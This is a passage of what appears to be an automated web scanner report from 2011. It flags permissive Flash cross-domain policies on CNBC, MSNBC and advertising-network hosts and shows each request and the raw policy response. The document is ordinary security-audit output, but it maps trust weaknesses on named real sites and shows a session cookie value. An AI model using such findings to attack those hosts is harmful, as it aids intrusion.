HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:41 GMT Server: Apache Last-Modified: Sat, 18 Jun 2011 00:37:19 GMT Accept-Ranges: bytes Content-Length: 3138 Connection: close Content-Type: application/xml; charset=utf-8 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="i.cmpnet.com " /> <allow-access-from domain="www.ttglive.com " /> <allow-access-from domain="www.ddj.com " /> <allow-access-from domain="building.co.uk " /> <allow-access-from domain="http.earthcache.net " />...[SNIP]... <allow-access-from domain="webcast.on24.com " /> <allow-access-from domain="*.on24.com " /> <allow-access-from domain="a659.g.akamai.net " /> <allow-access-from domain="wcc.webeventservices.com " /> <allow-access-from domain="event.meetingstream.com " /> <allow-access-from domain="event.ciscowebseminars.com " /> <allow-access-from domain="webcast.premiereglobal.com " /> <allow-access-from domain="event.cisco-live.com " /> <allow-access-from domain="*.cisco.com " /> <allow-access-from domain="*.cisco-live.com " /> <allow-access-from domain="*.ciscolivevirtual.veplatform.com " /> <allow-access-from domain="*.onlineseminarsolutions.com " /> <allow-access-from domain="intelwc.on24.com " /> <allow-access-from domain="*.ogilvy.com " /> <allow-access-from domain="motifcdn2.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="motifcdn.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="ad.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m2.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m3.doubleclick.net " secure="true" />...[SNIP]... <allow-access-from domain="m.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m1.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m2.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.fr.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.se.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="m.de.2mdn.net " secure="true" />...[SNIP]... <allow-access-from domain="event.webcast.meetyoo.de " secure="true" />...[SNIP]... <allow-access-from domain="webcast.acrobat.com " secure="true" />...[SNIP]... <allow-access-from domain="wccqa.webeventservices.com " /> <allow-access-from domain="eventqa.meetingstream.com " /> <allow-access-from domain="eventqa.ciscowebseminars.com " /> <allow-access-from domain="webcastqa.premiereglobal.com " /> <allow-access-from domain="eventqa.webcast.meetyoo.de " secure="true" />...[SNIP]... <allow-access-from domain="webcastqa.acrobat.com " secure="true" />...[SNIP]... <allow-access-from domain="livestream.webex.com " secure="true" />...[SNIP]... <allow-access-from domain="event.vcallinteraction.com " secure="true" />...[SNIP]... <allow-access-from domain="eventqa.vcallinteraction.com " secure="true" />...[SNIP]... <allow-access-from domain="vshowqa.on24.com " secure="true" />...[SNIP]... <allow-access-from domain="*.inbfw.com "/> <allow-access-from domain="ciscovirtualevents.webex.com "/> <allow-access-from domain="vmc.lillypro.co.uk "/> <allow-access-from domain="on24.force.com " secure="true" />...[SNIP]...
4.92. http://executivevision.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://executivevision.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: executivevision.cnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 31 May 2011 22:37:42 GMT Accept-Ranges: bytes ETag: "0ff4d5ae31fcc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:04:29 GMT Connection: close Content-Length: 3839 <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="nbcsports.com " /> <allow-access-from domain="nbcsports.msnbc.com " /> <allow-access-from domain="*.nbcsports.com " /> <allow-access-from domain="*.nbcsports.msnbc.com " /> <allow-access-from domain="*.msnbc.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.msnbc.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.ivillage.com " /> <allow-access-from domain="i.ivillage.com " /> <allow-access-from domain="devi.ivillage.com " /> <allow-access-from domain="*.nbcuni.com " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="msnbc-xpress " /> <allow-access-from domain="www.cnbc.com "/> <allow-access-from domain="*.cnbc.com "/> <allow-access-from domain="widgets.nbcuni.com "/> <allow-access-from domain="*.thenbcagency.com "/> <allow-access-from domain="*.veoh.com "/> <allow-access-from domain="*.imeem.com "/> <allow-access-from domain="*.livejournal.com "/> <allow-access-from domain="*.vox.com "/> <allow-access-from domain="*.sixapart.com "/> <allow-access-from domain="*.reuters.com "/> <allow-access-from domain="*.real.com "/> <allow-access-from domain="*.akamai.net "/> <allow-access-from domain="*.atlasrichmedia.co.au "/> <allow-access-from domain="*.atlasrichmedia.co.uk "/> <allow-access-from domain="*.atlasrichmedia.com "/> <allow-access-from domain="*.atdmt.com "/> <allow-access-from domain="*.eyeblasterwiz.com "/> <allow-access-from domain="*.serving-sys.com "/> <allow-access-from domain="*.Abc.com "/> <allow-access-from domain="*.Abcnews.com "/> <allow-access-from domain="*.Accuweather.com "/> <allow-access-from domain="*.Cbs.com "/> <allow-access-from domain="*.cbsnews.com "/> <allow-access-from domain="*.discovery.com "/> <allow-access-from domain="*.ew.com "/> <allow-access-from domain="*.fox.com "/> <allow-access-from domain="*.foxnews.com "/> <allow-access-from domain="*.ign.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.tvguide.com "/> <allow-access-from domain="*.weather.com "/> <allow-access-from domain="*.vh1.com "/> <allow-access-from domain="*.usatoday.com "/> <allow-access-from domain="*.bmg.com "/> <allow-access-from domain="*.bmgmusic.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.fluid.nl "/> <allow-access-from domain="*.myspace.com "/> <allow-access-from domain="*.myspacecdn.com "/> <allow-access-from domain="*.newsvine.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="64.207.156.207 "/> <allow-access-from domain="*.msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.unicornmedia.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.intellitxt.com "/> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="*.unicornmedia.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornapp.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com " secure="false"/>...[SNIP]... <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.93. http://js.adsonar.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://js.adsonar.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: js.adsonar.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT ETag: "a3d-466fac2afc940"-gzip Content-Type: application/xml Cache-Control: max-age=1800 Expires: Tue, 06 Sep 2011 15:30:15 GMT Date: Tue, 06 Sep 2011 15:00:15 GMT Content-Length: 2621 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="assets.espn.go.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="static.espn.go.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.quigo.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.lonelyplanet.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.mochila.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.conxise.net " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="app.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="media.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="static.scanscout.com " to-ports="*" secure="false"/>...[SNIP]... <allow-access-from domain="*.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.digitalcity.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.aolcdn.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="cdn-startpage.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="startpage.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.channels.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.channel.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.web.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.my.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.news.aol.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="iamalpha.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="imakealpha.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />...[SNIP]... <allow-access-from domain="*.spinner.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.popeater.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.theboombox.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.opticalcortex.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.yourminis.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.facebook.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.liveminis.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.brightcove.com " to-ports="*" secure="false" />...[SNIP]... <allow-access-from domain="*.lightningcast.com " to-ports="*" secure="false" />...[SNIP]...
4.94. http://login.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://login.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: login.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:23 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT ETag: "e0006-f5-4655351729f80" Accept-Ranges: bytes Content-Length: 245 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.95. https://login.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://login.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: login.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:36 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Tue, 17 Mar 2009 16:47:10 GMT ETag: "e0006-f5-4655351729f80" Accept-Ranges: bytes Content-Length: 245 Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.96. http://m.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://m.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: m.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:04:46 GMT Server: Apache X-Powered-By: PHP/5.2.10 Set-Cookie: SESS93eea98f293ea8fd633599e480cddfdc=u6gvdrmr9fm9tr67nrb374c6c3; path=/; domain=.cnbc.com Expires: 0 Last-Modified: Tue, 06 Sep 2011 15:04:46 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/xml Via: 1.1 aicache6 Content-Length: 255 X-Aicache-OS: 64.210.193.252:80 Connection: Keep-Alive Keep-Alive: max=20 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="m.cnbc.com" /> <allow-access-from domain="*.m.cnbc.com " />...[SNIP]...
4.97. http://media.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://media.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.cnbc.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 31 May 2011 22:37:42 GMT Accept-Ranges: bytes ETag: "0ff4d5ae31fcc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 1168 Date: Tue, 06 Sep 2011 14:56:31 GMT Connection: close Cache-Control: public, max-age=900 <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="*.msnbc.com " /> <allow-access-from domain="*.msn.com " /> <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="*.fluid.nl " /> <allow-access-from domain="64.207.156.207 " /> <allow-access-from domain="msnbc-xpress " /> <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.pulse360.com " /> <allow-access-from domain="*.context3.kanoodle.com " /> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.98. http://msnbcmedia.msn.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://msnbcmedia.msn.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: msnbcmedia.msn.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:08:37 GMT Last-Modified: Tue, 31 May 2011 22:37:42 GMT Content-Type: text/xml ETag: "0ff4d5ae31fcc1:0" Accept-Ranges: bytes Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 1168 Connection: close <?xml version="1.0"?> <!-- http://www.msnbc.com/crossdomain.xml --> <cross-domain-policy> <allow-access-from domain="*.msnbc.com " /> <allow-access-from domain="*.msn.com " /> <allow-access-from domain="msnbciweb " /> <allow-access-from domain="*.newsweek.com "/> <allow-access-from domain="*.washingtonpost.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="*.feedburner.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="*.fluid.nl " /> <allow-access-from domain="64.207.156.207 " /> <allow-access-from domain="msnbc-xpress " /> <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.pulse360.com " /> <allow-access-from domain="*.context3.kanoodle.com " /> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.99. http://optimized-by.rubiconproject.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://optimized-by.rubiconproject.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: optimized-by.rubiconproject.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:05 GMT Server: RAS/1.3 (Unix) Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Accept-Ranges: bytes Content-Length: 223 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.rubiconproject.com " />...[SNIP]...
4.100. http://pagead2.googlesyndication.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://pagead2.googlesyndication.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
Response
HTTP/1.0 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Tue, 06 Sep 2011 00:01:39 GMT Expires: Wed, 07 Sep 2011 00:01:39 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 53954 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="maps.gstatic.com " /> <allow-access-from domain="maps.gstatic.cn " /> <allow-access-from domain="*.googlesyndication.com " /> <allow-access-from domain="*.google.com " /> <allow-access-from domain="*.google.ae " /> <allow-access-from domain="*.google.at " /> <allow-access-from domain="*.google.be " /> <allow-access-from domain="*.google.ca " /> <allow-access-from domain="*.google.ch " /> <allow-access-from domain="*.google.cn " /> <allow-access-from domain="*.google.co.il " /> <allow-access-from domain="*.google.co.in " /> <allow-access-from domain="*.google.co.jp " /> <allow-access-from domain="*.google.co.kr " /> <allow-access-from domain="*.google.co.nz " /> <allow-access-from domain="*.google.co.uk " /> <allow-access-from domain="*.google.co.ve " /> <allow-access-from domain="*.google.co.za " /> <allow-access-from domain="*.google.com.ar " /> <allow-access-from domain="*.google.com.au " /> <allow-access-from domain="*.google.com.br " /> <allow-access-from domain="*.google.com.gr " /> <allow-access-from domain="*.google.com.hk " /> <allow-access-from domain="*.google.com.ly " /> <allow-access-from domain="*.google.com.mx " /> <allow-access-from domain="*.google.com.my " /> <allow-access-from domain="*.google.com.pe " /> <allow-access-from domain="*.google.com.ph " /> <allow-access-from domain="*.google.com.pk " /> <allow-access-from domain="*.google.com.ru " /> <allow-access-from domain="*.google.com.sg " /> <allow-access-from domain="*.google.com.tr " /> <allow-access-from domain="*.google.com.tw " /> <allow-access-from domain="*.google.com.ua " /> <allow-access-from domain="*.google.com.vn " /> <allow-access-from domain="*.google.de " /> <allow-access-from domain="*.google.dk " /> <allow-access-from domain="*.google.es " /> <allow-access-from domain="*.google.fi " /> <allow-access-from domain="*.google.fr " /> <allow-access-from domain="*.google.it " /> <allow-access-from domain="*.google.lt " /> <allow-access-from domain="*.google.lv " /> <allow-access-from domain="*.google.nl " /> <allow-access-from domain="*.google.no " /> <allow-access-from domain="*.google.pl " /> <allow-access-from domain="*.google.pt " /> <allow-access-from domain="*.google.ro " /> <allow-access-from domain="*.google.se " /> <allow-access-from domain="*.google.sk " /> <allow-access-from domain="*.youtube.com " /> <allow-access-from domain="*.ytimg.com " /> <allow-access-from domain="*.2mdn.net " /> <allow-access-from domain="*.doubleclick.net " /> <allow-access-from domain="*.doubleclick.com " />...[SNIP]...
4.101. http://pi.pardot.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://pi.pardot.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pi.pardot.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:03 GMT Server: Apache Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT ETag: "e5" Accept-Ranges: bytes Content-Length: 229 Cache-Control: max-age=63072000 Expires: Thu, 05 Sep 2013 15:32:03 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/xml X-Pardot-LB: lb-d2 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.pardot.com " /> <allow-access-from domain="*.visual.force.com " /> <site-control permitted-cross-domain-policies="master-on...[SNIP]...
4.102. http://quote.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://quote.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: quote.cnbc.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: application/xml Date: Tue, 06 Sep 2011 14:56:38 GMT Via: 1.1 C aicache6 Content-Length: 245 X-Aicache-OS: 64.210.195.136:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Wed, 07 Sep 2011 14:56:39 GMT <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.103. http://rd.rlcdn.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://rd.rlcdn.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: rd.rlcdn.com
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/xml Content-Length: 500 Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"...[SNIP]... <allow-access-from domain="*.casualcollective.com " /> <allow-access-from domain="*.tubemogul.com " /> <allow-access-from domain="*.inplay.tubemogul.com " /> <allow-access-from domain="*.grooveshark.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.adotube.com " />...[SNIP]...
4.104. http://search.cnbc.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://search.cnbc.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: search.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:01 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT ETag: "f5-492ea5fe9c100" Accept-Ranges: bytes Content-Type: application/xml Via: 1.1 aicache6 Content-Length: 245 X-Aicache-OS: 64.210.194.246:80 Connection: Keep-Alive Keep-Alive: max=20 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="www.cnbc.com " /> <allow-access-from domain="*.cnbc.com " /> <allow-access-from domain="www.msn.com " /> <allow-access-from domain="*.msn.com " />...[SNIP]...
4.105. http://server.iad.liveperson.net/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://server.iad.liveperson.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: server.iad.liveperson.net
Response
